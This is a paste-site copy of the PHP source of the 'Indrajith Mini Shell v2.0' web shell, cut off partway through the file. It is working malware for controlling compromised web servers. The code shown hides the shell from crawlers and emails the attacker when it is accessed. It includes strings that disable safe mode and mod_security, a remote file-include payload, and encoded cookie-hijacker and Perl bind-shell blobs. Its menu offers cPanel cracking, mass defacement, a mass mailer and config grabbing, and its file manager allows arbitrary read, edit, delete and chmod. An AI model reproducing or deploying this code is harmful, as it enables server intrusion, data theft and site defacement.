Indrajith v2 - Shells-Center.Com


SUBMITTED BY: Guest

DATE: Sept. 6, 2014, 7:24 a.m.

FORMAT: PHP

SIZE: 102.5 kB

HITS: 562

  1. <?php
  2. /*
  3. * Indrajith Mini Shell v.2.0 with additional features....
  4. * originally scripted by AJITH KP
  5. * (c) Under Gnu General Public Licence 3(c)
  6. * Team Open Fire and Indishell Family
  7. * TOF : Shritam Bhowmick, Null | Void, Alex, Ankit Sharma,John.
  8. * Indishell : ASHELL, D@rkwolf.
  9. * THA : THA RUDE [There is Nothing in Borders]
  10. * Love to : AMSTECK ARTS & SCIENCE COLLEGE, Kalliassery; Vishnu Nath KP, Sreeju, Sooraj, Komputer Korner Friends.
  11. */
  12. /*------------------ LOGIN -------------------*/
  13. $username="ajithkp560";
  14. $password="ajithkp560";
  15. $email="ajithkp560@gmail.com";
  16. /*------------------ Login Data End ----------*/
  17. @error_reporting(4);
  18. /*------------------ Anti Crawler ------------*/
  19. if(!empty($_SERVER['HTTP_USER_AGENT']))
  20. {
  21. $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
  22. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT']))
  23. {
  24. header('HTTP/1.0 404 Not Found');
  25. exit;
  26. }
  27. }
  28. echo "<meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW\" />"; //For Ensuring... Fuck all Robots...
  29. /*------------------ End of Anti Crawler -----*/
  30. echo "<link href=data:image/gif;base64,R0lGODlhEAAQAPcAADGcADmcADmcCEKcEEKlEEqlGEqlIVKlIVKtIVKtKVqtMWO1OWu1Qmu1SnO1SnO9SnO9Unu9WoS9Y4TGY4zGa4zGc5TGc5TOc5TOe5zOe5zOhK3WlLXepb3ercbntcbnvc7nvc7nxtbvzt7vzt7v1uf33u/35+/37/f37/f/9///9////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////ywAAAAAEAAQAAAIxwA7ABhIsGBBgQEAJAwwgIGEBQojEhQwcIEFDRUUUCS4UCEEjAc2RhQJoIGGCAIERODQQOLAAAc0SABwgEMIDgoSShQgAcMAAx08OBCgEYDImA0CbPiwoICHFBIoDogAwAGGAgpCVBggYgUHAwU2nFgBQEIFARVAGNCwAkNVEytCzKwwc0MHASVICHCQ4gTKgRJaVtAgQAQGBSdMJCDZ0WiADyoYAOCg4eVAkQpWCBRgIoTOjTotrHAwECwAgZYpdkBRQGKHgAAAOw== rel=icon type=image/x-icon />";
  31. echo "<style>
  32. html { background:url(http://www.ajithkp560.hostei.com/images/background.gif) black; }
  33. #loginbox { font-size:11px; color:green; width:1200px; height:200px; border:1px solid #4C83AF; background-color:#111111; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
  34. input { font-size:11px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; }
  35. loginbox td { border-radius:5px; font-size:11px; }
  36. .header { size:25px; color:green; }
  37. h1 { font-family:DigifaceWide; color:green; font-size:200%; }
  38. h1:hover { text-shadow:0 0 20px #00FFFF, 0 0 100px #00FFFF; }
  39. .go { height: 50px; width: 50px;float: left; margin-right: 10px; display: none; background-color: #090;}
  40. .input_big { width:75px; height:30px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; font-size:17px; }
  41. hr { border:1px solid #222222; }
  42. #meunlist { width: auto; height: auto; font-size: 12px; font-weight: bold; }
  43. #meunlist ul { padding-top: 5px; padding-right: 5px; padding-bottom: 7px; padding-left: 2px; text-align:center; list-style-type: none; margin: 0px; }
  44. #meunlist li { margin: 0px; padding: 0px; display: inline; }
  45. #meunlist a { font-size: 14px; text-decoration:none; font-weight: bold;color:green;clear: both;width: 100px;margin-right: -6px; padding-top: 3px; padding-right: 15px; padding-bottom: 3px; padding-left: 15px; }
  46. #meunlist a:hover { background: #333; color:green; }
  47. .menubar {-moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; }
  48. .menu { font-size:25px; color: }
  49. .textarea_edit { background-color:#111111; border:1px groove #333; color:green; }
  50. .textarea_edit:hover { text-decoration:none; border:1px dashed #333; }
  51. .input_butt {font-size:11px; background:#191919; color:#4C83AF; margin:0 4px; border:1px solid #222222;}
  52. #result{ -moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; min-height:100px;}
  53. .table{ width:100%; padding:4px 0; color:#888; font-size:15px; }
  54. .table a{ text-decoration:none; color:green; font-size:15px; }
  55. .table a:hover{text-decoration:underline;}
  56. .table td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:top; }
  57. .table th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; }
  58. .table tr:hover{ background:#181818; }
  59. .tbl{ width:100%; padding:4px 0; color:#888; font-size:15px; text-align:center; }
  60. .tbl a{ text-decoration:none; color:green; font-size:15px; vertical-align:middle; }
  61. .tbl a:hover{text-decoration:underline;}
  62. .tbl td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:middle; width: 300px; }
  63. .tbl th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; vertical-align:middle; }
  64. .tbl td:hover{ background:#181818; }
  65. #alert {position: relative;}
  66. #alert:hover:after {background: hsla(0,0%,0%,.8);border-radius: 3px;color: #f6f6f6;content: 'Click to dismiss';font: bold 12px/30px sans-serif;height: 30px;left: 50%;margin-left: -60px;position: absolute;text-align: center;top: 50px; width: 120px;}
  67. #alert:hover:before {border-bottom: 10px solid hsla(0,0%,0%,.8);border-left: 10px solid transparent;border-right: 10px solid transparent;content: '';height: 0;left: 50%;margin-left: -10px;position: absolute;top: 40px;width: 0;}
  68. #alert:target {display: none;}
  69. .alert_red {animation: alert 1s ease forwards;background-color: #c4453c;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -5px;width: 100%;}
  70. .alert_green {animation: alert 1s ease forwards;background-color: #43CD80;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -5px;width: 100%;}
  71. @keyframes alert {0% { opacity: 0; }50% { opacity: 1; }100% { top: 0; }}
  72. </style>";
  73. if($_COOKIE["user"] != $username && $_COOKIE["pass"] != md5($password))
  74. {
  75. if($_POST["usrname"]==$username && $_POST["passwrd"]==$password)
  76. {
  77. print'<script>document.cookie="user='.$_POST["usrname"].';";document.cookie="pass='.md5($_POST["passwrd"]).';";</script>';
  78. if($email!="")
  79. {
  80. mail_alert();
  81. }
  82. }
  83. else
  84. {
  85. if($_POST['usrname'])
  86. {
  87. print'<script>alert("Sorry... Wrong UserName/PassWord");</script>';
  88. }
  89. echo '<title>INDRAJITH SHELL v.2.0</title><center>
  90. <div id=loginbox><p><font face="verdana,arial" size=-1>
  91. <font color=orange>>>>>>>>>>></font><font color=white>>>>>><<<<<</font><font color=green>>>>>>>>>>></font>
  92. <center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
  93. <tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>INDRAJITH SHELL v.2.0</b></font></th></tr>
  94. <tr><td bgcolor="black" style="padding:5">
  95. <form method="post">
  96. <input type="hidden" name="action" value="login">
  97. <input type="hidden" name="hide" value="">
  98. <center><table>
  99. <tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" value="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
  100. <tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="passwrd" value="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
  101. <tr><td><font face="verdana,arial" size=-1>&nbsp;</font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Enter"></font></td></tr></table>
  102. </div><br /></center>';
  103. exit;
  104. }
  105. }
  106. $color_g="green";
  107. $color_b="4C83AF";
  108. $color_bg="#111111";
  109. $color_hr="#222";
  110. $color_wri="green";
  111. $color_rea="yellow";
  112. $color_non="red";
  113. $path=$_GET['path'];
  114. @session_start();
  115. @set_time_limit(0);
  116. @ini_restore("safe_mode_include_dir");
  117. @ini_restore("safe_mode_exec_dir");
  118. @ini_restore("disable_functions");
  119. @ini_restore("allow_url_fopen");
  120. @ini_restore("safe_mode");
  121. @ini_restore("open_basedir");
  122. @ignore_user_abort(FALSE);
  123. @ini_set('zlib.output_compression','Off');
  124. $safemode=@ini_get('safe_mode');
  125. $sep="/";
  126. if(strtolower(substr(PHP_OS,0,3))=="win")
  127. {
  128. $os="win";
  129. $sep="\\";
  130. $ox="Windows";
  131. }
  132. else
  133. {
  134. $os="nix";
  135. $ox="Linux";
  136. }
  137. $self=$_SERVER['PHP_SELF'];
  138. $srvr_sof=$_SERVER['SERVER_SOFTWARE'];
  139. $your_ip=$_SERVER['REMOTE_ADDR'];
  140. $srvr_ip=$_SERVER['SERVER_ADDR'];
  141. $admin=$_SERVER['SERVER_ADMIN'];
  142. $s_php_ini="safe_mode=OFF
  143. disable_functions=NONE";
  144. $ini_php="<?
  145. echo ini_get(\"safe_mode\");
  146. echo ini_get(\"open_basedir\");
  147. include(\$_GET[\"file\"]);
  148. ini_restore(\"safe_mode\");
  149. ini_restore(\"open_basedir\");
  150. echo ini_get(\"safe_mode\");
  151. echo ini_get(\"open_basedir\");
  152. include(\$_GET[\"ss\"]);
  153. ?>";
  154. $s_htaccess="<IfModule mod_security.c>
  155. Sec------Engine Off
  156. Sec------ScanPOST Off
  157. </IfModule>";
  158. $s_htaccess_pl="Options FollowSymLinks MultiViews Indexes ExecCGI
  159. AddType application/x-httpd-cgi .sh
  160. AddHandler cgi-script .pl
  161. AddHandler cgi-script .pl";
  162. $sym_htaccess="Options all
  163. DirectoryIndex Sux.html
  164. AddType text/plain .php
  165. AddHandler server-parsed .php
  166. AddType text/plain .html
  167. AddHandler txt .html
  168. Require None
  169. Satisfy Any";
  170. $sym_php_ini="safe_mode=OFF
  171. disable_functions=NONE";
  172. $forbid_dir="Options -Indexes";
  173. $cookie_highjacker="rVVdc5pAFH13xv9wh3Eipq22M3miasaJGGmNWsS2mU6HQVyEFlnCLkk7If+9d8EPCKFtpuVB2d1z7z177gf1Wvc8dMN6rXP6av/AJQlIZHGyBouBBaEVcaAOaNOhPninGWNYjNXJBMKIfiM2h53Zaadec+LA5h4N0AXX5nKrXruv1wAfzwF5QzgJbmVpbBhz82KiqVPD1OZSC05OgPHIthixt2El7CVIcfA9oHeB1GplXnfOxdPwQuhBle3bDPiQ/RGfkTKjz+Zopn8a6EN1KN5+z6sEfja7koc/cNTVq5mhmoPhsJpaAfMcRgXDCiIeY4TLDXOh6h9V/UszZ9P8mjKqOHtEtgL1N3QrTMuEK+wPEYoWEeFxFMiIEXd/yJWxTzdDi1u5QkbQhG56kk0Dx9vE2CaIY23+g++dNmxKv3ukQPfDUtWvzYWha9PLA99GRDYe4yQyNz5dWT5DE3lFqd8CL/BMzI3cPEJSRHOfHJGQkn2rmNWCSHvDNJ0ZbNejeHDgszVDis3+hNLzmW4cmccMo1obEhSxaWEvcWUOLrH1cje9YdzcEu7SdcHgSjXGs2Feka3pUvYkg/FskfdIHBKRqBxeV0eqrh6rorHGSdYTPyBLPqwXYpSN4BpcxVMYDA713sBk9xwakkCWsixLWJPWC+mokFA9RNXNrcVtV5Y6K5dvVx0PgZlFC5IESgi/ACkXtxPGnMkiPgbU5kqanwSE5EouKwkICZScSgkMRA6UQkISyFRVirIngMooR+ESGA4M9R4UeMg0wp2L2ey9pirHGu6uov5TA+F/XuGf7pBeQqm+QBA8pu/YPmUkpbrr9kOT45LYLgWpXuuKtPW7LrHWfVxxj/ukf/b6DKaUw4jGwbrbyTbxtJPCuiu6/imW7pt+DoUr3Av7hktw0NzEhIkP61KfgNQuFDnOiIVhLnUNJ2Zbgjv89gboxhFuAGcRdz0GKNEtidrdTpgGTkOKwXOOy18=";
  174. $bind_perl="rZJdb5swFIavi8R/OHXTFSSmZJu2i0abxAjtWApEQLtNVYUoOK1VgimmmqIq/30+dpKmmna1+Aq/7/Fzvjg6HD6JbnjLmmFLuxre/jYN0zjax5EY+P+jMee0oV3R0woKAQW0RdcDn0MQTRL3e5B9g5A1DNJ7WtfwdQlKm84+fhrBdRaf3Wwwe6lmP7MxjSdBIeXlA+3H+uLxZs7u5GXAhcr2GQZae+aiKRZ0hV7Lu/5AOm5yfnU9ulFSx3sutTvaq8/bJUZbJ33ZntgYUC4qaZO6rcgYUw/EUvR0gZpavbjXOptbmJs+AgnTH6z58J7YpvFsGgfrF7IkcuzFYTrzvWMYTvHZShFHWK3MozhCtWWlfnLlJw7MzvIg8jMH0tib5mmW+G7ogC7bBt5BxSgQ/eh0cIhQQXu88/aFksYXOQI0KE/8y9R3JxPptEX5YJGaOPDO3uFtEaegobLVaotDr6iqLmeNpYbqyN8Jebkb/drB4KMNoGZyCM1ORaH704uj6CVaR2ziTWPOO2ssW8VMckJFWVLZkncR+BG2oUD2GMqa4w+g5PXEeYuZskkQOUC+vNEewXVurfgy+6fnJ8lfnt6htd6lklRineb1XbJfCxKIwuoP";
  175. /*----------------------- Top Menu ------------------------------------------*/
  176. if($safemode=="On")
  177. {
  178. echo "<div id='alert'><a class=\"alert_red\" href=\"#alert\">Safe Mode : <font color=green>ON</font></a></div>";
  179. }
  180. else
  181. {
  182. echo "<div id='alert'><a class=\"alert_green\" href=\"#alert\">Safe Mode : <font color=red>OFF</font></a></div>";
  183. }
  184. echo "<script src=\"http://code.jquery.com/jquery-latest.js\"></script><script>$(\"#alert\").delay(3000).fadeOut(300);</script>";
  185. echo "<title>INDRAJITH SHELL v.2.0</title><div id=result>
  186. <table>
  187. <tbody>
  188. <tr>
  189. <td style='border-right:1px solid #104E8B;' width=\"300px;\">
  190. <div style='text-align:center;'>
  191. <a href='?' style='text-decoration:none;'><h1>INDRAJITH</h1></a><font color=blue>MINI SHELL</font>
  192. </div>
  193. </td>
  194. <td>
  195. <div class=\"header\">OS</font> <font color=\"#666\" >:</font>
  196. ".$ox." </font> <font color=\"#666\" >|</font> ".php_uname()."<br />
  197. Your IP : <font color=red>".$your_ip."</font> <font color=\"#666\" >|</font> Server IP : <font color=red>".$srvr_ip."</font> <font color=\"#666\" > | </font> Admin <font color=\"#666\" > : </font> <font color=red> {$admin} </font> <br />
  198. MySQL <font color=\"#666\" > : </font>"; echo mysqlx();
  199. echo "<font color=\"#666\" > | </font> Oracle <font color=\"#666\" > : </font>"; echo oraclesx();
  200. echo "<font color=\"#666\" > | </font> MSSQL <font color=\"#666\" > : </font>"; echo mssqlx();
  201. echo "<font color=\"#666\" > | </font> PostGreySQL <font color=\"#666\" > : </font>";echo postgreyx();
  202. echo "<br />cURL <font color=\"#666\" > : </font>";echo curlx();
  203. echo "<font color=\"#666\" > | </font>Total Space<font color=\"#666\" > : </font>"; echo disc_size();
  204. echo "<font color=\"#666\" > | </font>Free Space<font color=\"#666\" > : </font>"; echo freesize();
  205. echo "<br />Software<font color=\"#666\" > : </font><font color=red>{$srvr_sof}</font><font color=\"#666\" > | </font> PHP<font color=\"#666\" > : </font><a style='color:red; text-decoration:none;' target=_blank href=?phpinfo>".phpversion()."</a>
  206. <br />Disabled Functions<font color=\"#666\" > : </font></font><font color=red>";echo disabled_functns()."</font><br />";
  207. if($os == 'win'){ echo "Drives <font color=\"#666\" > : </font>";echo drivesx(); }
  208. else { echo "r00t Exploit <font color=\"#666\" > : </font><font color=red>"; echo r00t_exploit() ."</font>"; }
  209. echo "
  210. </div>
  211. </td>
  212. </tr>
  213. </tbody>
  214. </table></div>";
  215. echo "<div class='menubar'> <div id=\"meunlist\">
  216. <ul>
  217. <li><a href=\"?\">HOME</a></li>
  218. <li><a href=\"?symlink\">SymLink</a></li>
  219. <li><a href=\"?rs\">((( Connect )))</a></li>
  220. <li><a href=\"?cookiejack\">Cookie HighJack</a></li>
  221. <li><a href=\"?encodefile\">PHP Encode/Decode</a></li>
  222. <li><a href=\"?path={$path}&safe_mod\">Safe Mode Fucker</a></li>
  223. <li><a href=\"?path={$path}&forbd_dir\">Directory Listing Forbidden</a></li>
  224. </ul>
  225. <ul>
  226. <li><a href=\"?massmailer\">Mass Mailer</a></li>
  227. <li><a href=\"?cpanel_crack\">CPANEL Crack</a></li>
  228. <li><a href=\"?server_exploit_details\">Exploit Details</a></li>
  229. <li><a href=\"?remote_server_scan\">Remote Server Scan</a></li>
  230. <li><a href=\"?remotefiledown\">Remote File Downloader</a></li>
  231. <li><a href=\"?hexenc\">Hexa Encode/Decode</a></li>
  232. </ul>
  233. <ul>
  234. <li><a href=\"?sh311_scanner\">SH3LL Scan</a></li>
  235. <li><a href=\"?sshman\">SSH Shell</a></li>
  236. <li><a href=\"?path={$path}&c0de_inject\">c0de inj3ct</a></li>
  237. <li><a href=\"?ftpman\">FTP Manager</a></li>
  238. <li><a href=\"?ftp_anon_scan\">FTP Anonymous Access Scan</a></li>
  239. <li><a href=\"?path={$path}&mass_xploit\">Mass Deface</a></li>
  240. <li><a href=\"?config_grab\">Config Grabber</a></li>
  241. <li><a href=\"?killme\"><font color=red>Kill Me</font></a></li>
  242. </ul>
  243. </div></div>";
  244. /*----------------------- End of Top Menu -----------------------------------*/
  245. /*--------------- FUNCTIONS ----------------*/
  246. function alert($alert_txt)
  247. {
  248. echo "<script>alert('".$alert_txt."');window.location.href='?';</script>";
  249. }
  250. function disabled_functns()
  251. {
  252. if(!@ini_get('disable_functions'))
  253. {
  254. echo "None";
  255. }
  256. else
  257. {
  258. echo @ini_get('disable_functions');
  259. }
  260. }
  261. function drivesx()
  262. {
  263. foreach(range('A','Z') as $drive)
  264. {
  265. if(is_dir($drive.':\\'))
  266. {
  267. echo "<a style='color:green; text-decoration:none;' href='?path=".$drive.":\\'>[".$drive."]</a>";
  268. }
  269. }
  270. }
  271. function mail_alert()
  272. {
  273. global $email, $your_ip;
  274. $shell_path="http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
  275. $content_mail="Hello Master,\n
  276. Your shell in $shell_path is accessed by ".$_SERVER['REMOTE_ADDR'] .". Hope You Enjoy this shell very much.\n
  277. By Indrajith";
  278. mail($email, "Shell Accessed!!!", $content_mail ,"From:indrajith@shell.com");
  279. }
  280. function filesizex($size)
  281. {
  282. if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
  283. elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
  284. elseif ($size>=1024)$size = round(($size/1024),2)." KB";
  285. else $size .= " B";
  286. return $size;
  287. }
  288. function disc_size()
  289. {
  290. echo filesizex(disk_total_space("/"));
  291. }
  292. function freesize()
  293. {
  294. echo filesizex(disk_free_space("/"));
  295. }
  296. function file_perm($filz){
  297. if($m=fileperms($filz)){
  298. $p='';
  299. $p .= ($m & 00400) ? 'r' : '-';
  300. $p .= ($m & 00200) ? 'w' : '-';
  301. $p .= ($m & 00100) ? 'x' : '-';
  302. $p .= ($m & 00040) ? 'r' : '-';
  303. $p .= ($m & 00020) ? 'w' : '-';
  304. $p .= ($m & 00010) ? 'x' : '-';
  305. $p .= ($m & 00004) ? 'r' : '-';
  306. $p .= ($m & 00002) ? 'w' : '-';
  307. $p .= ($m & 00001) ? 'x' : '-';
  308. return $p;
  309. }
  310. else return "?????";
  311. }
  312. function mysqlx()
  313. {
  314. if(function_exists('mysql_connect'))
  315. {
  316. echo "<font color='red'>Enabled</font>";
  317. }
  318. else
  319. {
  320. echo "<font color='green'>Disabled</font>";
  321. }
  322. }
  323. function oraclesx()
  324. {
  325. if(function_exists('oci_connect'))
  326. {
  327. echo "<font color='red'>Enabled</font>";
  328. }
  329. else
  330. {
  331. echo "<font color='green'>Disabled</font>";
  332. }
  333. }
  334. function mssqlx()
  335. {
  336. if(function_exists('mssql_connect'))
  337. {
  338. echo "<font color='red'>Enabled</font>";
  339. }
  340. else
  341. {
  342. echo "<font color='green'>Disabled</font>";
  343. }
  344. }
  345. function postgreyx()
  346. {
  347. if(function_exists('pg_connect'))
  348. {
  349. echo "<font color='red'>Enabled</font>";
  350. }
  351. else
  352. {
  353. echo "<font color='green'>Disabled</font>";
  354. }
  355. }
  356. function strip($filx)
  357. {
  358. if(!get_magic_quotes_gpc()) return trim(urldecode($filx));
  359. return trim(urldecode(stripslashes($filx)));
  360. }
  361. function curlx()
  362. {
  363. if(function_exists('curl_version'))
  364. {
  365. echo "<font color='red'>Enabled</font>";
  366. }
  367. else
  368. {
  369. echo "<font color='green'>Disabled</font>";
  370. }
  371. }
  372. function filesize_x($filex)
  373. {
  374. $f_size=filesizex(filesize($filex));
  375. return $f_size;
  376. }
  377. function rename_ui()
  378. {
  379. $rf_path=$_GET['rename'];
  380. echo "<div id=result><center><h2>Rename</h2><hr /><p><br /><br /><form method='GET'><input type=hidden name='old_name' size='40' value=".$rf_path.">New Name : <input name='new_name' size='40' value=".basename($rf_path)."><input type='submit' value=' >>> ' /></form></p><br /><br /><hr /><br /><br /></center></div>";
  381. }
  382. function filemanager_bg()
  383. {
  384. global $sep, $self;
  385. $path=!empty($_GET['path'])?$_GET['path']:getcwd();
  386. $dirs=array();
  387. $fils=array();
  388. if(is_dir($path))
  389. {
  390. chdir($path);
  391. if($handle=opendir($path))
  392. {
  393. while(($item=readdir($handle))!==FALSE)
  394. {
  395. if($item=="."){continue;}
  396. if($item==".."){continue;}
  397. if(is_dir($item))
  398. {
  399. array_push($dirs, $path.$sep.$item);
  400. }
  401. else
  402. {
  403. array_push($fils, $path.$sep.$item);
  404. }
  405. }
  406. }
  407. else
  408. {
  409. alert("Access Denied for this operation!!!");
  410. }
  411. }
  412. else
  413. {
  414. alert("Access Denied for this operation!!!");
  415. }
  416. echo "<div id=result><table class=table>
  417. <tr>
  418. <th width='500px'>Name</th>
  419. <th width='100px'>Size</th>
  420. <th width='100px'>Permissions</th>
  421. <th width='500px'>Actions</th>
  422. </tr>";
  423. foreach($dirs as $dir)
  424. {
  425. echo "<tr><td><a href='{$self}?path={$dir}'>".basename($dir)."</a></td>
  426. <td>".filesize_x($dir)."</td>
  427. <td><a href='{$self}?path={$path}&perm={$dir}'>".file_perm($dir)."</a></td>
  428. <td><a href='{$self}?path={$path}&del_dir={$dir}'>Delete</a> | <a href='{$self}?path={$path}&rename={$dir}'>Rename</a></td></tr>";
  429. }
  430. foreach($fils as $fil)
  431. {
  432. echo "<tr><td><a href='{$self}?path={$path}&read={$fil}'>".basename($fil)."</a></td>
  433. <td>".filesize_x($fil)."</td>
  434. <td><a href='{$self}?path={$path}&perm={$fil}'>".file_perm($fil)."</a></td>
  435. <td><a href='{$self}?path={$path}&del_fil={$fil}'>Delete</a> | <a href='{$self}?path={$path}&rename={$fil}'>Rename</a> | <a href='{$self}?path={$path}&edit={$fil}'>Edit</a> | <a href='{$self}?path={$path}&copy={$fil}'>Copy</a> </td>";
  436. }
  437. echo "</tr></table></div>";
  438. }
  439. function rename_bg()
  440. {
  441. if(isset($_GET['old_name']) && isset($_GET['new_name']))
  442. {
  443. $o_r_path=basename($_GET['old_name']);
  444. $r_path=str_replace($o_r_path, "", $_GET['old_name']);
  445. $r_new_name=$r_path.$_GET['new_name'];
  446. echo $r_new_name;
  447. if(rename($_GET['old_name'], $r_new_name)==FALSE)
  448. {
  449. alert("Access Denied for this action!!!");
  450. }
  451. else
  452. {
  453. alert("Renamed File Succeessfully");
  454. }
  455. }
  456. }
  457. function edit_file()
  458. {
  459. $path=$_GET['path'];
  460. chdir($path);
  461. $edt_file=$_GET['edit'];
  462. $e_content = wordwrap(htmlspecialchars(file_get_contents($edt_file)));
  463. if($e_content)
  464. {
  465. $o_content=$e_content;
  466. }
  467. else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
  468. {
  469. $fd = fopen($edt_file, "rb");
  470. if(!$fd)
  471. {
  472. alert("Permission Denied");
  473. }
  474. else
  475. {
  476. while(!feof($fd))
  477. {
  478. $o_content=wordwrap(htmlspecialchars(fgets($fd)));
  479. }
  480. }
  481. fclose($fd);
  482. }
  483. echo "<div id='result'><center><h2>Edit File</h2><hr /></center><br /><font color=red>View File</font> : <font color=green><a style='text-decoration:none; color:green;' href='?read=".$_GET['edit']."'>". basename($_GET['edit']) ."</a><br /><br /><hr /><br /></font><form method='POST'><input type='hidden' name='e_file' value=".$_GET['edit'].">
  484. <center><textarea spellcheck='false' class='textarea_edit' name='e_content_n' cols='80' rows='25'>".$o_content."</textarea></center><hr />
  485. <input class='input_big' name='save' type='submit' value=' Save ' /><br /><br /><hr /><br /><br /></div>";
  486. }
  487. function edit_file_bg()
  488. {
  489. if(file_exists($_POST['e_file']))
  490. {
  491. $handle = fopen($_POST['e_file'],"w+");
  492. if (!handle)
  493. {
  494. alert("Permission Denied");
  495. }
  496. else
  497. {
  498. fwrite($handle,$_POST['e_content_n']);
  499. alert("Your changes were Successfully Saved!");
  500. }
  501. fclose($handle);
  502. }
  503. else
  504. {
  505. alert("File Not Found!!!");
  506. }
  507. }
  508. function delete_file()
  509. {
  510. $del_file=$_GET['del_fil'];
  511. if(unlink($del_file) != FALSE)
  512. {
  513. alert("Deleted Successfully");
  514. exit;
  515. }
  516. else
  517. {
  518. alert("Access Denied for this Operation");
  519. exit;
  520. }
  521. }
  522. function deldirs($d_dir)
  523. {
  524. $d_files= glob($d_dir.'*', GLOB_MARK);
  525. foreach($d_files as $d_file)
  526. {
  527. if(is_dir($d_file))
  528. {
  529. deldirs($d_file);
  530. }
  531. else
  532. {
  533. unlink($d_file);
  534. }
  535. }
  536. if(is_dir($d_dir))
  537. {
  538. if(rmdir($d_dir))
  539. {
  540. alert("Deleted Directory Successfully");
  541. }
  542. else
  543. {
  544. alert("Access Denied for this Operation");
  545. }
  546. }
  547. }
  548. function code_viewer()
  549. {
  550. $path=$_GET['path'];
  551. $r_file=$_GET['read'];
  552. $r_content = wordwrap(htmlspecialchars(file_get_contents($r_file)));
  553. if($r_content)
  554. {
  555. $rr_content=$r_content;
  556. }
  557. else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
  558. {
  559. $fd = fopen($r_file, "rb");
  560. if (!$fd)
  561. {
  562. alert("Permission Denied");
  563. }
  564. else
  565. {
  566. while(!feof($fd))
  567. {
  568. $rr_content=wordwrap(htmlspecialchars(fgets($fd)));
  569. }
  570. }
  571. fclose($fd);
  572. }
  573. echo "<div id=result><center><h2>View File</h2></center><hr /><br /><font color=red>Edit File</font><font color=green> : </font><font color=#999><a style='text-decoration:none; color:green;' href='?path={$path}&edit=".$_GET['read']."'>". basename($_GET['read']) ."</a></font><br /><br /><hr /><pre><code>".$rr_content."</code></pre><br /><br /><hr /><br /><br /></div>";
  574. }
  575. function copy_file_ui()
  576. {
  577. echo "<div id=result><center><h2>Copy File</h2><hr /><br /><br /><table class=table><form method='GET'><tr><td style='text-align:center;'>Copy : <input size=40 name='c_file' value=".$_GET['copy']." > To : <input size=40 name='c_target' value=".$_GET['path'].$sep."> Name : <input name='cn_name'><input type='submit' value=' >> ' /></form></table><br /><br /><hr /><br /><br /><br /></center></div>";
  578. }
  579. function copy_file_bg()
  580. {
  581. global $sep;
  582. if(function_exists(copy))
  583. {
  584. if(copy($_GET['c_file'], $_GET['c_target'].$sep.$_GET['cn_name']))
  585. {
  586. alert("Succeded");
  587. }
  588. else
  589. {
  590. alert("Access Denied");
  591. }
  592. }
  593. }
  594. function ch_perm_bg()
  595. {
  596. if(isset($_GET['p_filex']) && isset($_GET['new_perm']))
  597. {
  598. if(chmod($_GET['p_filex'], $_GET['new_perm']) !=FALSE)
  599. {
  600. alert("Succeded. Permission Changed!!!");
  601. }
  602. else
  603. {
  604. alert("Access Denied for This Operation");
  605. }
  606. }
  607. }
  608. function ch_perm_ui()
  609. {
  610. $p_file=$_GET['perm'];
  611. echo "<div id =result><center><h2>New Permission</h2><hr /><p><form method='GET'><input type='hidden' name='path' value=".getcwd()." ><input name='p_filex' type=hidden value={$p_file} >New Permission : <input name='new_perm' isze='40' value=0".substr(sprintf('%o', fileperms($p_file)), -3)."><input type='submit' value=' >> ' /></form></p><p>Full Access : <font color=red>755</font><br />Notice : <font color=red>Don't use Unix Access like 777, 666, etc. Use 755, 655, etc</p><br /><br /><hr /><br /><br /></center></div>";
  612. ch_perm_bg();
  613. }
  614. function mk_file_ui()
  615. {
  616. chdir($_GET['path']);
  617. echo "<div id=result><br /><br /><font color=red><form method='GET'>
  618. <input type='hidden' name='path' value=".getcwd().">
